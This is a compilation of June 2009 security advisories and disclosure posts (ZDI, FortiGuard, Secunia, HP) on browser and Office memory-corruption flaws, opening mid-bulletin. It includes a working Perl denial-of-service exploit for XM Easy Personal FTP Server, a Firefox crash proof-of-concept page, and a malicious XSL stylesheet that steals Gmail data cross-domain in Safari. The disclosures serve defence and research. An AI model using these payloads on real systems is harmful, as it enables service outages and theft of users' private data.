fips_1_1_2.FIPS-LIB fips_1_1_2.FIPS-MAN fips_1_1_2.FIPS-MIS fips_1_1_2.FIPS-RUN fips_1_1_2.FIPS-SRC action: install revision FIPS-OPENSSL-1.1.2.051 or subsequent fips_1_2.FIPS-CONF fips_1_2.FIPS-DOC fips_1_2.FIPS-INC fips_1_2.FIPS-LIB fips_1_2.FIPS-MAN fips_1_2.FIPS-MIS fips_1_2.FIPS-RUN fips_1_2.FIPS-SRC action: install revision FIPS-OPENSSL-1.2.003 or subsequent openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: install revision A.00.09.08k.003 or subsequent URL: http://software.hp.com END AFFECTED VERSIONS HISTORY Version:1 (rev.1) 9 June 2009 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To
FortiGuard Advisory: Microsoft Internet Explorer DHTML Handling Remote Memory Corruption Vulnerability
Microsoft Internet Explorer DHTML Handling Remote Memory Corruption Vulnerability 2009.June.09 Fortinet's FortiGuard Global Security Research Team Discovers Memory Corruption Vulnerability in Microsoft's Internet Explorer. Summary: A memory corruption vulnerability exists in the DHTML handling of Microsoft's Internet Explorer which allows a remote attacker to compromise a system through a malicious site. Impact: === Remote Code Execution. Risk: = Critical Affected Software: == For a list of operating system and product versions affected, please see the Microsoft Bulletin reference below. Additional Information: === The vulnerability occurs when Internet Explorer processes special DHTML functions. A crash may happen when destroying a window after making a sequence of calls on the tr element. These calls are linked to the insertion, deletion and attributes of a table cell. The crash may then allow the arbitrary execution of code on the browsers machine. Solutions: == Use the solution provided by Microsoft (MS09-019). The FortiGuard Global Security Research Team released a signature MS.IE.DHTML.Function.Remote.Code.Execution, which covers this specific vulnerability. Fortinet customers who subscribe to Fortinet's intrusion prevention (IPS) service should be protected against this memory corruption vulnerability. Fortinet's IPS service is one component of FortiGuard Subscription Services, which also offer comprehensive solutions such as antivirus, Web content filtering and antispam capabilities. These services enable protection against threats on both application and network layers. FortiGuard Services are continuously updated by the FortiGuard Global Security Research Team, which enables Fortinet to deliver a combination of multi-layered security intelligence and true zero-day protection from new and emerging threats. These updates are delivered to all FortiGate, FortiMail and FortiClient products. Fortinet strictly follows responsible disclosure guidelines to ensure optimum protection during a threat's lifecycle. References: === FortiGuard Advisory: http://www.fortiguardcenter.com/advisory/FGA-2009-22.html Microsoft Bulletin: http://www.microsoft.com/technet/security/bulletin/ms09-019.mspx CVE ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1141 Acknowledgement: Haifei Li of Fortinet's FortiGuard Global Security Research Team *** This email and any attachments thereto may contain private, confidential, and privileged material for the sole use of the intended recipient. Any review, copying, or distribution of this email (or any attachments thereto) by others is strictly prohibited. If you are not the intended recipient, please contact the sender immediately and permanently delete the original and any copies of this email and any attachments thereto. ***
ZDI-09-038: Microsoft Internet Explorer Event Handler Memory Corruption Vulnerability
ZDI-09-038: Microsoft Internet Explorer Event Handler Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-038 June 10, 2009 -- CVE ID: CVE-2009-1530 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Internet Explorer -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists when repeatedly calling event handlers after adding nodes of an HTML document. When a specially crafted webpage is repeatedly rendered, memory is improperly reused after it has been freed. Due to the controllable nature of the web browser, this vulnerability can be exploited to remotely compromise a system running under the security context of the currently logged in user. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/MS09-019.mspx -- Disclosure Timeline: 2009-01-26 - Vulnerability reported to vendor 2009-06-10 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * ling wushi of team509 -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/
ZDI-09-041: Microsoft Internet Explorer 8 Rows Property Dangling Pointer Code Execution Vulnerability
ZDI-09-041: Microsoft Internet Explorer 8 Rows Property Dangling Pointer Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-041 June 10, 2009 -- CVE ID: CVE-2009-1532 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Internet Explorer -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer 8. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists during the rendering of an HTML page with malformed row property references, resulting in a dangling pointer which can be abused to execute arbitrary code. Internet Explorer 7 is not affected. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/MS09-019.mspx -- Disclosure Timeline: 2009-03-19 - Vulnerability reported to vendor 2009-06-10 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Nils -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/
FortiGuard Advisory: Apple Safari Remote Memory Corruption Vulnerability
Apple Safari Remote Memory Corruption Vulnerability 2009.June.09 Fortinet's FortiGuard Global Security Research Team Discovers Vulnerability in Apple Safari. Summary: A memory corruption vulnerability exists in Apple Safari which allows a remote attacker to execute arbitrary code through a malicious webpage. Impact: === Remote Code Execution. Risk: = Critical Affected Software: == For a list of product versions affected, please see the Apple Security Update reference below. Additional Information: === The memory corruption vulnerability occurs when handling HTML table elements. A remote attacker may craft a malicious webpage and lure an unsuspecting user. When the page is viewed and these elements are processed, arbitrary code execution may occur resulting in the victims machine being compromised. Solutions: == Apple security updates are available via their Software Update mechanism. Apple security updates are available for manual download here. The FortiGuard Global Security Research Team released a signature DHTML.Malicious.Table.Elements, which covers this specific vulnerability. Fortinet customers who subscribe to Fortinet's intrusion prevention (IPS) service should be protected against this memory corruption vulnerability. Fortinet's IPS service is one component of FortiGuard Subscription Services, which also offer comprehensive solutions such as antivirus, Web content filtering and antispam capabilities. These services enable protection against threats on both application and network layers. FortiGuard Services are continuously updated by the FortiGuard Global Security Research Team, which enables Fortinet to deliver a combination of multi-layered security intelligence and true zero-day protection from new and emerging threats. These updates are delivered to all FortiGate, FortiMail and FortiClient products. Fortinet strictly follows responsible disclosure guidelines to ensure optimum protection during a threat's lifecycle. References: === FortiGuard Advisory: http://www.fortiguardcenter.com/advisory/FGA-2009-23.html Apple Security Updates for Safari 4.0: http://support.apple.com/kb/HT3613 Apple Security Updates for iPhone: http://support.apple.com/kb/HT3318 CVE ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4231 Acknowledgement: Haifei Li of Fortinet's FortiGuard Global Security Research Team *** This email and any attachments thereto may contain private, confidential, and privileged material for the sole use of the intended recipient. Any review, copying, or distribution of this email (or any attachments thereto) by others is strictly prohibited. If you are not the intended recipient, please contact the sender immediately and permanently delete the original and any copies of this email and any attachments thereto. ***
ZDI-09-035: Microsoft Word Document Stack Based Buffer Overflow Vulnerability
ZDI-09-035: Microsoft Word Document Stack Based Buffer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-035 June 10, 2009 -- CVE ID: CVE-2009-0563 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Office Word -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Word. User interaction is required to exploit this vulnerability in that the target must visit a malicious page, open a malicious e-mail, or open a malicious file. The specific flaw exists within the parsing of vulnerable tags inside a Microsoft Word document. Microsoft Word trusts a length field read from the file which is used to read file contents into a buffer allocated on the stack. When an invalid length is present, a stack based buffer overflow occurs, resulting in the ability to execute arbitrary code. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/MS09-027.mspx -- Disclosure Timeline: 2008-07-08 - Vulnerability reported to vendor 2009-06-10 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * ling wushi of team509 -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/
XM Easy Personal FTP Server HELP and TYPE command Remote Denial of Service exploit
#!usr/bin/perl -w ### # XM Easy Personal FTP Server 5.x allows remote attackers to cause a denial of service # via a HELP or TYPE command with an overly long argument. # Refer: # http://secunia.com/advisories/35271/ #Original advisory avaiable at: http://securitygyan.com/2009/06/09/xm-easy-personal-ftp-server-help-and-type-command-rdos-exploit/ # Product link: http://www.dxm2008.com/ # #$This was strictly written for educational purpose. Use it at your own risk.$$ #$Author will not bare any responsibility for any damages watsoever.$$ # #Author:Vinod Sharma #Email: vinodsharma[underscore]mimit[at]gmail.com #Blog: http://securitygyan.com/ #Date: 09th june, 2009 # # ###Thanks all the Security Folks### use IO::Socket; my $server_ip=$ARGV[0]; my $server_port=$ARGV[1]; my $username=$ARGV[2]; my $password=$ARGV[3]; my $command=$ARGV[4]; my $buffer=$command . .\x41 x 1 .\r\n; if(($#ARGV + 1)!=5) { print \nUsage: XM_FTP_Serv_Exploit.pl server_ip_address server_port username password command\n; print \nargument command can have a value HELP or TYPE\n; print \nExample: XM_FTP_Serv_Exploit.pl 192.16.16.8 21 anonymous 123456 HELP; exit; } $socket = new IO::Socket::INET (PeerAddr =$server_ip, PeerPort = $server_port, Proto = 'tcp', ) or die Couldn't connect to Server\n; while (1) { $socket-recv($recv_data,1024); print RECIEVED: $recv_data; $send_data1 =USER .$username.\r\n; $socket-send($send_data1); $socket-recv($recv_data1,1024); print RECIEVED: $recv_data1; $send_data2 =PASS .$password.\r\n; $socket-send($send_data2); $socket-recv($recv_data2,1024); print RECIEVED: $recv_data2; $socket-send($buffer); print \nAttack is send.\n; $socket-recv($recv_data3,1024); print RECIEVED: $recv_data3; close $socket; }
[ECHO_ADV_110$2009] Firefox (GNU/Linux version) = 3.0.10 Denial Of Services
___ ___ \_ _/\_ ___ \ / | \\_ \ |__)_ /\ \//~\/ | \ |\\ \___\Y/|\ /___ / \__ /\___|_ /\___ / \/ \/ \/ \/ .OR.ID ECHO_ADV_110$2009 [ECHO_ADV_110$2009] Firefox (GNU/Linux version) = 3.0.10 Denial Of Services Author : Ahmad Muammar W.K (a.k.a) y3dips Date Found : June, 4th 2009 Location: Indonesia, Jakarta web : http://e-rdc.org/v1/news.php?readmore=137 Critical Lvl: Moderated Impact : Browser will automatically shutdown Where : From Remote Disclosure Policy: Full Disclosure Policy (RFPolicy) v2.0 http://www.wiretrip.net/rfp/policy.html Affected software description: ~~ Firefox is a popular Internet browser from the Mozilla Corporation. Application : Firefox for GNU/linux version : Firefox/3.0.10 (X11; Linux i686; U; en) Also affected for lower version (tested for version 3.0.8 at Ubuntu 9.0.4) URL : http://firefox.com Bugzilla entry : https://bugzilla.mozilla.org/show_bug.cgi?id=496265 Description : Firefox 3.0.10 (previous version) for GNU/Linux Operating systems are unable to handle big size of GIF images rendering when it becomes a body backgrounds. Just use a random size GIF files will crash firefox because of HTML body tag. Exploit Code: !-- Firefox 3.0.10 DOS exploit, discovered by Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id) http://y3dips.echo.or.id //-- html head titleFirefox Exploit/title body background=exploit.gif /body /html live exploit : http://y3dips.echo.or.id/tempe/ff310expl/ Timeline: ~ - 20 - 05 - 2009 bug found - 04 - 06 - 2009 vendor contacted and adding entry to bugzilla - 04 - 06 - 2009 vendor response, and there`s a potential patch - 09 - 06 - 2009 advisory release Shoutz: ~~~ ~ my family (ana my wife and ali my son) ~ the_day, K-159, negative, hero, az001, rey, and also all echo staff ~ janex vind waraxe, str0ke, chopstick ~ newbie_hacker[at]yahoogroups.com ~ #e-c-h-o @irc.dal.net Contact: y3dips || echo|staff || y3dips[at]echo[dot]or[dot]id Homepage: http://y3dips.echo.or.id/ [ EOF ] ---
Secunia Research: Microsoft PowerPoint Freelance Layout Parsing Vulnerability
== Secunia Research 10/06/2009 - Microsoft PowerPoint Freelance Layout Parsing Vulnerability - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Microsoft Office PowerPoint 2000 * Microsoft Office PowerPoint 2002 NOTE: Other versions may also be affected. == 2) Severity Rating: Moderately critical Impact: System compromise Where: Remote == 3) Vendor's Description of Software Microsoft Office PowerPoint 2007 enables users to quickly create high-impact, dynamic presentations, while integrating workflow and ways to easily share information. From the Microsoft Office Fluent user interface to the new graphics and formatting capabilities, Office PowerPoint 2007 puts the control in your hands to create great-looking presentations.. Product Link: http://office.microsoft.com/powerpoint == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Microsoft PowerPoint, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused by an array-indexing error in the Microsoft PowerPoint Freelance Windows 2.1 Translator (FL21WIN.DLL) when parsing layout information and can be exploited to cause a heap-based buffer overflow. Successful exploitation allows execution of arbitrary code. NOTE: On systems with MS09-017 applied, support for Freelance files is disabled by default, but can be re-enabled via a key in the registry. == 5) Solution Microsoft states that no fix will be issued. However, installations with MS09-017 applied block opening of Freelance files by default. Users having enabled Freelance file support should not open Freelance files from untrusted sources. == 6) Time Table 22/05/2009 - Vendor notified. 23/05/2009 - Vendor response. 03/06/2009 - Vendor informs that no security bulletin will be issued as Freelance files are blocked by default after applying MS09-017. 04/06/2009 - Vendor informed that Secunia agrees that a new security bulletin is not required. It is, however, recommended to update MS09-017 to inform users that Freelance support has been disabled by default and should not be re-enabled as the translator is affected by a critical vulnerability. 10/06/2009 - Public disclosure. == 7) Credits Discovered by Carsten Eiram, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2009-0202 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/
Secunia Research: Adobe Reader JBIG2 Text Region Segment Buffer Overflow
== Secunia Research 10/06/2009 - Adobe Reader JBIG2 Text Region Segment Buffer Overflow - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Adobe Reader 9.1.0 NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System access Where: From remote == 3) Vendor's Description of Software Adobe Reader software is the global standard for electronic document sharing. It is the only PDF file viewer that can open and interact with all PDF documents. Product Link: http://www.adobe.com/products/reader/ == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Adobe Reader, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in the processing of Huffman encoded JBIG2 text region segments. This can be exploited to cause a heap-based buffer overflow via a specially crafted PDF file. Successful exploitation may allow execution of arbitrary code. == 5) Solution Update to version 9.1.2, 8.1.6, or 7.1.3. == 6) Time Table 14/04/2009 - Vendor notified. 14/04/2009 - Vendor response. 10/06/2009 - Public disclosure. == 7) Credits Discovered by Alin Rad Pop, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2009-0198 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2009-24/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
Apple Safari cross-domain XML theft vulnerability
Hi, Safari prior to version 4 may permit an evil web page to steal arbitrary XML data cross-domain. This is accomplished by abusing a relatively obscure cross-domain access point which was completely missing a cross-domain access check. The access point in question is the document() function in XSL. This is best illustrated with a sample evil XSL file which abuses this function: xsl:stylesheet version=1.0 xmlns:xsl=http://www.w3.org/1999/XSL/Transform; xmlns:str=http://exslt.org/strings; extension-element-prefixes=str xsl:template match=* html body Below, you should see e-mail stolen cross-domain! p/ xsl:value-of select=document('https://mail.google.com/mail/feed/atom')/ script alert(document.body.innerHTML) /script /body /html /xsl:template /xsl:stylesheet To mount the attack, the attacker would serve a web page which has XML MIME type and requests to be styled by the evil stylesheet: ?xml version=1.0 encoding=ISO-8859-1? ?xml-stylesheet type=text/xsl href=safaristealmailbug.xsl? xml irrelevant /xml There are a number of interesting XML-based formats you might want to steal including authenticated RSS, XML-formatted AJAX-y responses, and XHTML. Full technical details: http://scary.beasts.org/security/CESA-2009-008.html Blog post: http://scarybeastsecurity.blogspot.com/2009/06/apples-safari-4-also-fixes-cross-domain.html (includes 1-click demo) Cheers Chris
ZDI-09-036: Microsoft Internet Explorer setCapture Memory Corruption Vulnerability
ZDI-09-036: Microsoft Internet Explorer setCapture Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-036 June 10, 2009 -- CVE ID: CVE-2009-1529 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Internet Explorer -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific vulnerability exists when calling the setCapture method on a range of objects. When setCapture is called on a collection of specially crafted objects memory becomes corrupted. When the capture is released, arbitrary memory is accessed potentially leading to remote code execution. Exploitation of this vulnerability will lead to system compromise under the credentials of the currently logged in user. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/MS09-019.mspx -- Disclosure Timeline: 2009-01-26 - Vulnerability reported to vendor 2009-06-10 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Peter Vreugdenhil -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/